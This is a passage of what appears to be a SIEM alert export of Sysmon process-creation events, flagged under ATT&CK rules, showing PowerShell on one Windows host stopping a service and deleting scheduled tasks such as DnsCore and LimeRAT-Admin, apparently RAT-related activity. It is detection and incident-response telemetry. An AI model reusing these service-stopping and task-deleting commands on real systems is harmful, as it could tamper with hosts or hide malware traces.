Corporation"",""originalFileName"":""sc.exe"",""commandLine"":""\\\""C:\\\\Windows\\\\system32\\\\sc.exe\\\"" Stop xWinWpdSrv"",""currentDirectory"":""C:\\\\Users\\\\John Williams\\\\Documents\\\\"",""user"":""DESKTOP-HUE026H\\\\John Williams"",""logonGuid"":""{df9fc3d3-b279-5ecf-0000-0020fd750300}"",""logonId"":""0x375fd"",""terminalSessionId"":""1"",""integrityLevel"":""Medium"",""hashes"":""MD5=E46C638010C25479F66BACBE8596CA76,SHA256=39C59C362649090B4D34E5C8221C6E86552C07FE2DF3478D591A68B70917BC0A,IMPHASH=35A7FFDE18D444A92D32C8B2879450FF"",""parentProcessGuid"":""{df9fc3d3-b359-5ecf-0000-0010f5eb1800}"",""parentProcessId"":""6056"",""parentImage"":""C:\\\\Windows\\\\System32\\\\WindowsPowerShell\\\\v1.0\\\\powershell.exe"",""parentCommandLine"":""\\\""C:\\\\Windows\\\\System32\\\\WindowsPowerShell\\\\v1.0\\\\powershell.exe\\\"" -Version 5.1 -s -NoLogo -NoProfile""}}}", +"May 29, 2020 @ 14:18:07.149",8,"ATT&CK: Quick Execution of a Series of Suspicious Commands","""Process Create: +RuleName: +UtcTime: 2020-05-28 12:49:39.475 +ProcessGuid: {df9fc3d3-b363-5ecf-0000-001060391a00} +ProcessId: 3564 +Image: C:\Windows\System32\sc.exe +FileVersion: 10.0.18362.1 (WinBuild.160101.0800) +Description: Service Control Manager Configuration Tool +Product: Microsoft® Windows® Operating System +Company: Microsoft Corporation +OriginalFileName: sc.exe +CommandLine: C:\Windows\system32\sc.exe start wuauserv +CurrentDirectory: C:\Windows\system32\ +User: NT AUTHORITY\SYSTEM +LogonGuid: {df9fc3d3-b270-5ecf-0000-0020e7030000} +LogonId: 0x3E7 +TerminalSessionId: 0 +IntegrityLevel: System +Hashes: MD5=E46C638010C25479F66BACBE8596CA76,SHA256=39C59C362649090B4D34E5C8221C6E86552C07FE2DF3478D591A68B70917BC0A,IMPHASH=35A7FFDE18D444A92D32C8B2879450FF +ParentProcessGuid: {df9fc3d3-b272-5ecf-0000-0010be3f0100} +ParentProcessId: 1092 +ParentImage: C:\Windows\System32\svchost.exe +ParentCommandLine: C:\Windows\system32\svchost.exe -k netsvcs -p""","C:\\Windows\\system32\\sc.exe start wuauserv",,"{""win"":{""system"":{""providerName"":""Microsoft-Windows-Sysmon"",""providerGuid"":""{5770385f-c22a-43e0-bf4c-06f5698ffbd9}"",""eventID"":""1"",""version"":""5"",""level"":""4"",""task"":""1"",""opcode"":""0"",""keywords"":""0x8000000000000000"",""systemTime"":""2020-05-28T12:49:39.569216100Z"",""eventRecordID"":""2266"",""processID"":""2260"",""threadID"":""3256"",""channel"":""Microsoft-Windows-Sysmon/Operational"",""computer"":""DESKTOP-HUE026H"",""severityValue"":""INFORMATION"",""message"":""\""Process Create:\r\nRuleName: \r\nUtcTime: 2020-05-28 12:49:39.475\r\nProcessGuid: {df9fc3d3-b363-5ecf-0000-001060391a00}\r\nProcessId: 3564\r\nImage: C:\\Windows\\System32\\sc.exe\r\nFileVersion: 10.0.18362.1 (WinBuild.160101.0800)\r\nDescription: Service Control Manager Configuration Tool\r\nProduct: Microsoft® Windows® Operating System\r\nCompany: Microsoft Corporation\r\nOriginalFileName: sc.exe\r\nCommandLine: C:\\Windows\\system32\\sc.exe start wuauserv\r\nCurrentDirectory: C:\\Windows\\system32\\\r\nUser: NT AUTHORITY\\SYSTEM\r\nLogonGuid: {df9fc3d3-b270-5ecf-0000-0020e7030000}\r\nLogonId: 0x3E7\r\nTerminalSessionId: 0\r\nIntegrityLevel: System\r\nHashes: MD5=E46C638010C25479F66BACBE8596CA76,SHA256=39C59C362649090B4D34E5C8221C6E86552C07FE2DF3478D591A68B70917BC0A,IMPHASH=35A7FFDE18D444A92D32C8B2879450FF\r\nParentProcessGuid: {df9fc3d3-b272-5ecf-0000-0010be3f0100}\r\nParentProcessId: 1092\r\nParentImage: C:\\Windows\\System32\\svchost.exe\r\nParentCommandLine: C:\\Windows\\system32\\svchost.exe -k netsvcs -p\""""},""eventdata"":{""utcTime"":""2020-05-28 12:49:39.475"",""processGuid"":""{df9fc3d3-b363-5ecf-0000-001060391a00}"",""processId"":""3564"",""image"":""C:\\\\Windows\\\\System32\\\\sc.exe"",""fileVersion"":""10.0.18362.1 (WinBuild.160101.0800)"",""description"":""Service Control Manager Configuration Tool"",""product"":""Microsoft® Windows® Operating System"",""company"":""Microsoft Corporation"",""originalFileName"":""sc.exe"",""commandLine"":""C:\\\\Windows\\\\system32\\\\sc.exe start wuauserv"",""currentDirectory"":""C:\\\\Windows\\\\system32\\\\"",""user"":""NT AUTHORITY\\\\SYSTEM"",""logonGuid"":""{df9fc3d3-b270-5ecf-0000-0020e7030000}"",""logonId"":""0x3e7"",""terminalSessionId"":""0"",""integrityLevel"":""System"",""hashes"":""MD5=E46C638010C25479F66BACBE8596CA76,SHA256=39C59C362649090B4D34E5C8221C6E86552C07FE2DF3478D591A68B70917BC0A,IMPHASH=35A7FFDE18D444A92D32C8B2879450FF"",""parentProcessGuid"":""{df9fc3d3-b272-5ecf-0000-0010be3f0100}"",""parentProcessId"":""1092"",""parentImage"":""C:\\\\Windows\\\\System32\\\\svchost.exe"",""parentCommandLine"":""C:\\\\Windows\\\\system32\\\\svchost.exe -k netsvcs -p""}}}", +"May 29, 2020 @ 14:18:06.087",14,"ATT&CK T1064: Windows Shell Spawning Suspicious Program","""Process Create: +RuleName: +UtcTime: 2020-05-28 12:49:37.753 +ProcessGuid: {df9fc3d3-b361-5ecf-0000-0010920d1a00} +ProcessId: 6072 +Image: C:\Windows\System32\schtasks.exe +FileVersion: 10.0.18362.175 (WinBuild.160101.0800) +Description: Task Scheduler Configuration Tool +Product: Microsoft® Windows® Operating System +Company: Microsoft Corporation +OriginalFileName: schtasks.exe +CommandLine: ""C:\Windows\system32\schtasks.exe"" /Delete /TN ECDnsCore /F +CurrentDirectory: C:\Users\John Williams\Documents\ +User: DESKTOP-HUE026H\John Williams +LogonGuid: {df9fc3d3-b279-5ecf-0000-0020fd750300} +LogonId: 0x375FD +TerminalSessionId: 1 +IntegrityLevel: Medium +Hashes: MD5=003D681048A63B9862C299F30492CFDF,SHA256=D3222E48A036C6C730BB4E67B4C02E83C87860701975F408E5BF708B4B9CDBF4,IMPHASH=E59000FC08C43F1D70C9403E04909313 +ParentProcessGuid: {df9fc3d3-b359-5ecf-0000-0010f5eb1800} +ParentProcessId: 6056 +ParentImage: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe +ParentCommandLine: ""C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"" -Version 5.1 -s -NoLogo -NoProfile""","\""C:\\Windows\\system32\\schtasks.exe\"" /Delete /TN ECDnsCore /F",,"{""win"":{""system"":{""providerName"":""Microsoft-Windows-Sysmon"",""providerGuid"":""{5770385f-c22a-43e0-bf4c-06f5698ffbd9}"",""eventID"":""1"",""version"":""5"",""level"":""4"",""task"":""1"",""opcode"":""0"",""keywords"":""0x8000000000000000"",""systemTime"":""2020-05-28T12:49:37.755565500Z"",""eventRecordID"":""2260"",""processID"":""2260"",""threadID"":""3256"",""channel"":""Microsoft-Windows-Sysmon/Operational"",""computer"":""DESKTOP-HUE026H"",""severityValue"":""INFORMATION"",""message"":""\""Process Create:\r\nRuleName: \r\nUtcTime: 2020-05-28 12:49:37.753\r\nProcessGuid: {df9fc3d3-b361-5ecf-0000-0010920d1a00}\r\nProcessId: 6072\r\nImage: C:\\Windows\\System32\\schtasks.exe\r\nFileVersion: 10.0.18362.175 (WinBuild.160101.0800)\r\nDescription: Task Scheduler Configuration Tool\r\nProduct: Microsoft® Windows® Operating System\r\nCompany: Microsoft Corporation\r\nOriginalFileName: schtasks.exe\r\nCommandLine: \""C:\\Windows\\system32\\schtasks.exe\"" /Delete /TN ECDnsCore /F\r\nCurrentDirectory: C:\\Users\\John Williams\\Documents\\\r\nUser: DESKTOP-HUE026H\\John Williams\r\nLogonGuid: {df9fc3d3-b279-5ecf-0000-0020fd750300}\r\nLogonId: 0x375FD\r\nTerminalSessionId: 1\r\nIntegrityLevel: Medium\r\nHashes: MD5=003D681048A63B9862C299F30492CFDF,SHA256=D3222E48A036C6C730BB4E67B4C02E83C87860701975F408E5BF708B4B9CDBF4,IMPHASH=E59000FC08C43F1D70C9403E04909313\r\nParentProcessGuid: {df9fc3d3-b359-5ecf-0000-0010f5eb1800}\r\nParentProcessId: 6056\r\nParentImage: C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\r\nParentCommandLine: \""C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\"" -Version 5.1 -s -NoLogo -NoProfile\""""},""eventdata"":{""utcTime"":""2020-05-28 12:49:37.753"",""processGuid"":""{df9fc3d3-b361-5ecf-0000-0010920d1a00}"",""processId"":""6072"",""image"":""C:\\\\Windows\\\\System32\\\\schtasks.exe"",""fileVersion"":""10.0.18362.175 (WinBuild.160101.0800)"",""description"":""Task Scheduler Configuration Tool"",""product"":""Microsoft® Windows® Operating System"",""company"":""Microsoft Corporation"",""originalFileName"":""schtasks.exe"",""commandLine"":""\\\""C:\\\\Windows\\\\system32\\\\schtasks.exe\\\"" /Delete /TN ECDnsCore /F"",""currentDirectory"":""C:\\\\Users\\\\John Williams\\\\Documents\\\\"",""user"":""DESKTOP-HUE026H\\\\John Williams"",""logonGuid"":""{df9fc3d3-b279-5ecf-0000-0020fd750300}"",""logonId"":""0x375fd"",""terminalSessionId"":""1"",""integrityLevel"":""Medium"",""hashes"":""MD5=003D681048A63B9862C299F30492CFDF,SHA256=D3222E48A036C6C730BB4E67B4C02E83C87860701975F408E5BF708B4B9CDBF4,IMPHASH=E59000FC08C43F1D70C9403E04909313"",""parentProcessGuid"":""{df9fc3d3-b359-5ecf-0000-0010f5eb1800}"",""parentProcessId"":""6056"",""parentImage"":""C:\\\\Windows\\\\System32\\\\WindowsPowerShell\\\\v1.0\\\\powershell.exe"",""parentCommandLine"":""\\\""C:\\\\Windows\\\\System32\\\\WindowsPowerShell\\\\v1.0\\\\powershell.exe\\\"" -Version 5.1 -s -NoLogo -NoProfile""}}}", +"May 29, 2020 @ 14:18:06.071",14,"ATT&CK T1064: Windows Shell Spawning Suspicious Program","""Process Create: +RuleName: +UtcTime: 2020-05-28 12:49:37.727 +ProcessGuid: {df9fc3d3-b361-5ecf-0000-0010ea0b1a00} +ProcessId: 5076 +Image: C:\Windows\System32\schtasks.exe +FileVersion: 10.0.18362.175 (WinBuild.160101.0800) +Description: Task Scheduler Configuration Tool +Product: Microsoft® Windows® Operating System +Company: Microsoft Corporation +OriginalFileName: schtasks.exe +CommandLine: ""C:\Windows\system32\schtasks.exe"" /Delete /TN DnsCore /F +CurrentDirectory: C:\Users\John Williams\Documents\ +User: DESKTOP-HUE026H\John Williams +LogonGuid: {df9fc3d3-b279-5ecf-0000-0020fd750300} +LogonId: 0x375FD +TerminalSessionId: 1 +IntegrityLevel: Medium +Hashes: MD5=003D681048A63B9862C299F30492CFDF,SHA256=D3222E48A036C6C730BB4E67B4C02E83C87860701975F408E5BF708B4B9CDBF4,IMPHASH=E59000FC08C43F1D70C9403E04909313 +ParentProcessGuid: {df9fc3d3-b359-5ecf-0000-0010f5eb1800} +ParentProcessId: 6056 +ParentImage: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe +ParentCommandLine: ""C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"" -Version 5.1 -s -NoLogo -NoProfile""","\""C:\\Windows\\system32\\schtasks.exe\"" /Delete /TN DnsCore /F",,"{""win"":{""system"":{""providerName"":""Microsoft-Windows-Sysmon"",""providerGuid"":""{5770385f-c22a-43e0-bf4c-06f5698ffbd9}"",""eventID"":""1"",""version"":""5"",""level"":""4"",""task"":""1"",""opcode"":""0"",""keywords"":""0x8000000000000000"",""systemTime"":""2020-05-28T12:49:37.730622700Z"",""eventRecordID"":""2259"",""processID"":""2260"",""threadID"":""3256"",""channel"":""Microsoft-Windows-Sysmon/Operational"",""computer"":""DESKTOP-HUE026H"",""severityValue"":""INFORMATION"",""message"":""\""Process Create:\r\nRuleName: \r\nUtcTime: 2020-05-28 12:49:37.727\r\nProcessGuid: {df9fc3d3-b361-5ecf-0000-0010ea0b1a00}\r\nProcessId: 5076\r\nImage: C:\\Windows\\System32\\schtasks.exe\r\nFileVersion: 10.0.18362.175 (WinBuild.160101.0800)\r\nDescription: Task Scheduler Configuration Tool\r\nProduct: Microsoft® Windows® Operating System\r\nCompany: Microsoft Corporation\r\nOriginalFileName: schtasks.exe\r\nCommandLine: \""C:\\Windows\\system32\\schtasks.exe\"" /Delete /TN DnsCore /F\r\nCurrentDirectory: C:\\Users\\John Williams\\Documents\\\r\nUser: DESKTOP-HUE026H\\John Williams\r\nLogonGuid: {df9fc3d3-b279-5ecf-0000-0020fd750300}\r\nLogonId: 0x375FD\r\nTerminalSessionId: 1\r\nIntegrityLevel: Medium\r\nHashes: MD5=003D681048A63B9862C299F30492CFDF,SHA256=D3222E48A036C6C730BB4E67B4C02E83C87860701975F408E5BF708B4B9CDBF4,IMPHASH=E59000FC08C43F1D70C9403E04909313\r\nParentProcessGuid: {df9fc3d3-b359-5ecf-0000-0010f5eb1800}\r\nParentProcessId: 6056\r\nParentImage: C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\r\nParentCommandLine: \""C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\"" -Version 5.1 -s -NoLogo -NoProfile\""""},""eventdata"":{""utcTime"":""2020-05-28 12:49:37.727"",""processGuid"":""{df9fc3d3-b361-5ecf-0000-0010ea0b1a00}"",""processId"":""5076"",""image"":""C:\\\\Windows\\\\System32\\\\schtasks.exe"",""fileVersion"":""10.0.18362.175 (WinBuild.160101.0800)"",""description"":""Task Scheduler Configuration Tool"",""product"":""Microsoft® Windows® Operating System"",""company"":""Microsoft Corporation"",""originalFileName"":""schtasks.exe"",""commandLine"":""\\\""C:\\\\Windows\\\\system32\\\\schtasks.exe\\\"" /Delete /TN DnsCore /F"",""currentDirectory"":""C:\\\\Users\\\\John Williams\\\\Documents\\\\"",""user"":""DESKTOP-HUE026H\\\\John Williams"",""logonGuid"":""{df9fc3d3-b279-5ecf-0000-0020fd750300}"",""logonId"":""0x375fd"",""terminalSessionId"":""1"",""integrityLevel"":""Medium"",""hashes"":""MD5=003D681048A63B9862C299F30492CFDF,SHA256=D3222E48A036C6C730BB4E67B4C02E83C87860701975F408E5BF708B4B9CDBF4,IMPHASH=E59000FC08C43F1D70C9403E04909313"",""parentProcessGuid"":""{df9fc3d3-b359-5ecf-0000-0010f5eb1800}"",""parentProcessId"":""6056"",""parentImage"":""C:\\\\Windows\\\\System32\\\\WindowsPowerShell\\\\v1.0\\\\powershell.exe"",""parentCommandLine"":""\\\""C:\\\\Windows\\\\System32\\\\WindowsPowerShell\\\\v1.0\\\\powershell.exe\\\"" -Version 5.1 -s -NoLogo -NoProfile""}}}", +"May 29, 2020 @ 14:18:06.056",14,"ATT&CK T1064: Windows Shell Spawning Suspicious Program","""Process Create: +RuleName: +UtcTime: 2020-05-28 12:49:37.693 +ProcessGuid: {df9fc3d3-b361-5ecf-0000-00102d0a1a00} +ProcessId: 4976 +Image: C:\Windows\System32\schtasks.exe +FileVersion: 10.0.18362.175 (WinBuild.160101.0800) +Description: Task Scheduler Configuration Tool +Product: Microsoft® Windows® Operating System +Company: Microsoft Corporation +OriginalFileName: schtasks.exe +CommandLine: ""C:\Windows\system32\schtasks.exe"" /Delete /TN ""Update service for Windows Service"" /F +CurrentDirectory: C:\Users\John Williams\Documents\ +User: DESKTOP-HUE026H\John Williams +LogonGuid: {df9fc3d3-b279-5ecf-0000-0020fd750300} +LogonId: 0x375FD +TerminalSessionId: 1 +IntegrityLevel: Medium +Hashes: MD5=003D681048A63B9862C299F30492CFDF,SHA256=D3222E48A036C6C730BB4E67B4C02E83C87860701975F408E5BF708B4B9CDBF4,IMPHASH=E59000FC08C43F1D70C9403E04909313 +ParentProcessGuid: {df9fc3d3-b359-5ecf-0000-0010f5eb1800} +ParentProcessId: 6056 +ParentImage: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe +ParentCommandLine: ""C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"" -Version 5.1 -s -NoLogo -NoProfile""","\""C:\\Windows\\system32\\schtasks.exe\"" /Delete /TN \""Update service for Windows Service\"" /F",,"{""win"":{""system"":{""providerName"":""Microsoft-Windows-Sysmon"",""providerGuid"":""{5770385f-c22a-43e0-bf4c-06f5698ffbd9}"",""eventID"":""1"",""version"":""5"",""level"":""4"",""task"":""1"",""opcode"":""0"",""keywords"":""0x8000000000000000"",""systemTime"":""2020-05-28T12:49:37.696089000Z"",""eventRecordID"":""2258"",""processID"":""2260"",""threadID"":""3256"",""channel"":""Microsoft-Windows-Sysmon/Operational"",""computer"":""DESKTOP-HUE026H"",""severityValue"":""INFORMATION"",""message"":""\""Process Create:\r\nRuleName: \r\nUtcTime: 2020-05-28 12:49:37.693\r\nProcessGuid: {df9fc3d3-b361-5ecf-0000-00102d0a1a00}\r\nProcessId: 4976\r\nImage: C:\\Windows\\System32\\schtasks.exe\r\nFileVersion: 10.0.18362.175 (WinBuild.160101.0800)\r\nDescription: Task Scheduler Configuration Tool\r\nProduct: Microsoft® Windows® Operating System\r\nCompany: Microsoft Corporation\r\nOriginalFileName: schtasks.exe\r\nCommandLine: \""C:\\Windows\\system32\\schtasks.exe\"" /Delete /TN \""Update service for Windows Service\"" /F\r\nCurrentDirectory: C:\\Users\\John Williams\\Documents\\\r\nUser: DESKTOP-HUE026H\\John Williams\r\nLogonGuid: {df9fc3d3-b279-5ecf-0000-0020fd750300}\r\nLogonId: 0x375FD\r\nTerminalSessionId: 1\r\nIntegrityLevel: Medium\r\nHashes: MD5=003D681048A63B9862C299F30492CFDF,SHA256=D3222E48A036C6C730BB4E67B4C02E83C87860701975F408E5BF708B4B9CDBF4,IMPHASH=E59000FC08C43F1D70C9403E04909313\r\nParentProcessGuid: {df9fc3d3-b359-5ecf-0000-0010f5eb1800}\r\nParentProcessId: 6056\r\nParentImage: C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\r\nParentCommandLine: \""C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\"" -Version 5.1 -s -NoLogo -NoProfile\""""},""eventdata"":{""utcTime"":""2020-05-28 12:49:37.693"",""processGuid"":""{df9fc3d3-b361-5ecf-0000-00102d0a1a00}"",""processId"":""4976"",""image"":""C:\\\\Windows\\\\System32\\\\schtasks.exe"",""fileVersion"":""10.0.18362.175 (WinBuild.160101.0800)"",""description"":""Task Scheduler Configuration Tool"",""product"":""Microsoft® Windows® Operating System"",""company"":""Microsoft Corporation"",""originalFileName"":""schtasks.exe"",""commandLine"":""\\\""C:\\\\Windows\\\\system32\\\\schtasks.exe\\\"" /Delete /TN \\\""Update service for Windows Service\\\"" /F"",""currentDirectory"":""C:\\\\Users\\\\John Williams\\\\Documents\\\\"",""user"":""DESKTOP-HUE026H\\\\John Williams"",""logonGuid"":""{df9fc3d3-b279-5ecf-0000-0020fd750300}"",""logonId"":""0x375fd"",""terminalSessionId"":""1"",""integrityLevel"":""Medium"",""hashes"":""MD5=003D681048A63B9862C299F30492CFDF,SHA256=D3222E48A036C6C730BB4E67B4C02E83C87860701975F408E5BF708B4B9CDBF4,IMPHASH=E59000FC08C43F1D70C9403E04909313"",""parentProcessGuid"":""{df9fc3d3-b359-5ecf-0000-0010f5eb1800}"",""parentProcessId"":""6056"",""parentImage"":""C:\\\\Windows\\\\System32\\\\WindowsPowerShell\\\\v1.0\\\\powershell.exe"",""parentCommandLine"":""\\\""C:\\\\Windows\\\\System32\\\\WindowsPowerShell\\\\v1.0\\\\powershell.exe\\\"" -Version 5.1 -s -NoLogo -NoProfile""}}}", +"May 29, 2020 @ 14:18:05.962",14,"ATT&CK T1064: Windows Shell Spawning Suspicious Program","""Process Create: +RuleName: +UtcTime: 2020-05-28 12:49:37.667 +ProcessGuid: {df9fc3d3-b361-5ecf-0000-001092081a00} +ProcessId: 7260 +Image: C:\Windows\System32\schtasks.exe +FileVersion: 10.0.18362.175 (WinBuild.160101.0800) +Description: Task Scheduler Configuration Tool +Product: Microsoft® Windows® Operating System +Company: Microsoft Corporation +OriginalFileName: schtasks.exe +CommandLine: ""C:\Windows\system32\schtasks.exe"" /Delete /TN DnsCore /F +CurrentDirectory: C:\Users\John Williams\Documents\ +User: DESKTOP-HUE026H\John Williams +LogonGuid: {df9fc3d3-b279-5ecf-0000-0020fd750300} +LogonId: 0x375FD +TerminalSessionId: 1 +IntegrityLevel: Medium +Hashes: MD5=003D681048A63B9862C299F30492CFDF,SHA256=D3222E48A036C6C730BB4E67B4C02E83C87860701975F408E5BF708B4B9CDBF4,IMPHASH=E59000FC08C43F1D70C9403E04909313 +ParentProcessGuid: {df9fc3d3-b359-5ecf-0000-0010f5eb1800} +ParentProcessId: 6056 +ParentImage: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe +ParentCommandLine: ""C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"" -Version 5.1 -s -NoLogo -NoProfile""","\""C:\\Windows\\system32\\schtasks.exe\"" /Delete /TN DnsCore /F",,"{""win"":{""system"":{""providerName"":""Microsoft-Windows-Sysmon"",""providerGuid"":""{5770385f-c22a-43e0-bf4c-06f5698ffbd9}"",""eventID"":""1"",""version"":""5"",""level"":""4"",""task"":""1"",""opcode"":""0"",""keywords"":""0x8000000000000000"",""systemTime"":""2020-05-28T12:49:37.669910600Z"",""eventRecordID"":""2257"",""processID"":""2260"",""threadID"":""3256"",""channel"":""Microsoft-Windows-Sysmon/Operational"",""computer"":""DESKTOP-HUE026H"",""severityValue"":""INFORMATION"",""message"":""\""Process Create:\r\nRuleName: \r\nUtcTime: 2020-05-28 12:49:37.667\r\nProcessGuid: {df9fc3d3-b361-5ecf-0000-001092081a00}\r\nProcessId: 7260\r\nImage: C:\\Windows\\System32\\schtasks.exe\r\nFileVersion: 10.0.18362.175 (WinBuild.160101.0800)\r\nDescription: Task Scheduler Configuration Tool\r\nProduct: Microsoft® Windows® Operating System\r\nCompany: Microsoft Corporation\r\nOriginalFileName: schtasks.exe\r\nCommandLine: \""C:\\Windows\\system32\\schtasks.exe\"" /Delete /TN DnsCore /F\r\nCurrentDirectory: C:\\Users\\John Williams\\Documents\\\r\nUser: DESKTOP-HUE026H\\John Williams\r\nLogonGuid: {df9fc3d3-b279-5ecf-0000-0020fd750300}\r\nLogonId: 0x375FD\r\nTerminalSessionId: 1\r\nIntegrityLevel: Medium\r\nHashes: MD5=003D681048A63B9862C299F30492CFDF,SHA256=D3222E48A036C6C730BB4E67B4C02E83C87860701975F408E5BF708B4B9CDBF4,IMPHASH=E59000FC08C43F1D70C9403E04909313\r\nParentProcessGuid: {df9fc3d3-b359-5ecf-0000-0010f5eb1800}\r\nParentProcessId: 6056\r\nParentImage: C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\r\nParentCommandLine: \""C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\"" -Version 5.1 -s -NoLogo -NoProfile\""""},""eventdata"":{""utcTime"":""2020-05-28 12:49:37.667"",""processGuid"":""{df9fc3d3-b361-5ecf-0000-001092081a00}"",""processId"":""7260"",""image"":""C:\\\\Windows\\\\System32\\\\schtasks.exe"",""fileVersion"":""10.0.18362.175 (WinBuild.160101.0800)"",""description"":""Task Scheduler Configuration Tool"",""product"":""Microsoft® Windows® Operating System"",""company"":""Microsoft Corporation"",""originalFileName"":""schtasks.exe"",""commandLine"":""\\\""C:\\\\Windows\\\\system32\\\\schtasks.exe\\\"" /Delete /TN DnsCore /F"",""currentDirectory"":""C:\\\\Users\\\\John Williams\\\\Documents\\\\"",""user"":""DESKTOP-HUE026H\\\\John Williams"",""logonGuid"":""{df9fc3d3-b279-5ecf-0000-0020fd750300}"",""logonId"":""0x375fd"",""terminalSessionId"":""1"",""integrityLevel"":""Medium"",""hashes"":""MD5=003D681048A63B9862C299F30492CFDF,SHA256=D3222E48A036C6C730BB4E67B4C02E83C87860701975F408E5BF708B4B9CDBF4,IMPHASH=E59000FC08C43F1D70C9403E04909313"",""parentProcessGuid"":""{df9fc3d3-b359-5ecf-0000-0010f5eb1800}"",""parentProcessId"":""6056"",""parentImage"":""C:\\\\Windows\\\\System32\\\\WindowsPowerShell\\\\v1.0\\\\powershell.exe"",""parentCommandLine"":""\\\""C:\\\\Windows\\\\System32\\\\WindowsPowerShell\\\\v1.0\\\\powershell.exe\\\"" -Version 5.1 -s -NoLogo -NoProfile""}}}", +"May 29, 2020 @ 14:18:05.946",14,"ATT&CK T1064: Windows Shell Spawning Suspicious Program","""Process Create: +RuleName: +UtcTime: 2020-05-28 12:49:37.641 +ProcessGuid: {df9fc3d3-b361-5ecf-0000-001002071a00} +ProcessId: 8148 +Image: C:\Windows\System32\schtasks.exe +FileVersion: 10.0.18362.175 (WinBuild.160101.0800) +Description: Task Scheduler Configuration Tool +Product: Microsoft® Windows® Operating System +Company: Microsoft Corporation +OriginalFileName: schtasks.exe +CommandLine: ""C:\Windows\system32\schtasks.exe"" /Delete /TN LimeRAT-Admin /F +CurrentDirectory: C:\Users\John Williams\Documents\ +User: DESKTOP-HUE026H\John Williams +LogonGuid: {df9fc3d3-b279-5ecf-0000-0020fd750300} +LogonId: 0x375FD +TerminalSessionId: 1 +IntegrityLevel: Medium +Hashes: MD5=003D681048A63B9862C299F30492CFDF,SHA256=D3222E48A036C6C730BB4E67B4C02E83C87860701975F408E5BF708B4B9CDBF4,IMPHASH=E59000FC08C43F1D70C9403E04909313 +ParentProcessGuid: {df9fc3d3-b359-5ecf-0000-0010f5eb1800} +ParentProcessId: 6056 +ParentImage: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe +ParentCommandLine: ""C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"" -Version 5.1 -s -NoLogo -NoProfile""","\""C:\\Windows\\system32\\schtasks.exe\"" /Delete /TN LimeRAT-Admin /F",,"{""win"":{""system"":{""providerName"":""Microsoft-Windows-Sysmon"",""providerGuid"":""{5770385f-c22a-43e0-bf4c-06f5698ffbd9}"",""eventID"":""1"",""version"":""5"",""level"":""4"",""task"":""1"",""opcode"":""0"",""keywords"":""0x8000000000000000"",""systemTime"":""2020-05-28T12:49:37.645347900Z"",""eventRecordID"":""2256"",""processID"":""2260"",""threadID"":""3256"",""channel"":""Microsoft-Windows-Sysmon/Operational"",""computer"":""DESKTOP-HUE026H"",""severityValue"":""INFORMATION"",""message"":""\""Process Create:\r\nRuleName: \r\nUtcTime: 2020-05-28 12:49:37.641\r\nProcessGuid: {df9fc3d3-b361-5ecf-0000-001002071a00}\r\nProcessId: 8148\r\nImage: C:\\Windows\\System32\\schtasks.exe\r\nFileVersion: 10.0.18362.175 (WinBuild.160101.0800)\r\nDescription: Task Scheduler Configuration Tool\r\nProduct: Microsoft® Windows® Operating System\r\nCompany: Microsoft Corporation\r\nOriginalFileName: schtasks.exe\r\nCommandLine: \""C:\\Windows\\system32\\schtasks.exe\"" /Delete /TN LimeRAT-Admin /F\r\nCurrentDirectory: C:\\Users\\John Williams\\Documents\\\r\nUser: DESKTOP-HUE026H\\John Williams\r\nLogonGuid: {df9fc3d3-b279-5ecf-0000-0020fd750300}\r\nLogonId: 0x375FD\r\nTerminalSessionId: 1\r\nIntegrityLevel: Medium\r\nHashes: MD5=003D681048A63B9862C299F30492CFDF,SHA256=D3222E48A036C6C730BB4E67B4C02E83C87860701975F408E5BF708B4B9CDBF4,IMPHASH=E59000FC08C43F1D70C9403E04909313\r\nParentProcessGuid: {df9fc3d3-b359-5ecf-0000-0010f5eb1800}\r\nParentProcessId: 6056\r\nParentImage: C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\r\nParentCommandLine: \""C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\"" -Version 5.1 -s -NoLogo -NoProfile\""""},""eventdata"":{""utcTime"":""2020-05-28 12:49:37.641"",""processGuid"":""{df9fc3d3-b361-5ecf-0000-001002071a00}"",""processId"":""8148"",""image"":""C:\\\\Windows\\\\System32\\\\schtasks.exe"",""fileVersion"":""10.0.18362.175 (WinBuild.160101.0800)"",""description"":""Task Scheduler Configuration Tool"",""product"":""Microsoft® Windows® Operating System"",""company"":""Microsoft Corporation"",""originalFileName"":""schtasks.exe"",""commandLine"":""\\\""C:\\\\Windows\\\\system32\\\\schtasks.exe\\\"" /Delete /TN LimeRAT-Admin /F"",""currentDirectory"":""C:\\\\Users\\\\John Williams\\\\Documents\\\\"",""user"":""DESKTOP-HUE026H\\\\John Williams"",""logonGuid"":""{df9fc3d3-b279-5ecf-0000-0020fd750300}"",""logonId"":""0x375fd"",""terminalSessionId"":""1"",""integrityLevel"":""Medium"",""hashes"":""MD5=003D681048A63B9862C299F30492CFDF,SHA256=D3222E48A036C6C730BB4E67B4C02E83C87860701975F408E5BF708B4B9CDBF4,IMPHASH=E59000FC08C43F1D70C9403E04909313"",""parentProcessGuid"":""{df9fc3d3-b359-5ecf-0000-0010f5eb1800}"",""parentProcessId"":""6056"",""parentImage"":""C:\\\\Windows\\\\System32\\\\WindowsPowerShell\\\\v1.0\\\\powershell.exe"",""parentCommandLine"":""\\\""C:\\\\Windows\\\\System32\\\\WindowsPowerShell\\\\v1.0\\\\powershell.exe\\\"" -Version 5.1 -s -NoLogo -NoProfile""}}}", +"May 29, 2020 @ 14:18:05.930",14,"ATT&CK T1064: Windows Shell Spawning Suspicious Program","""Process 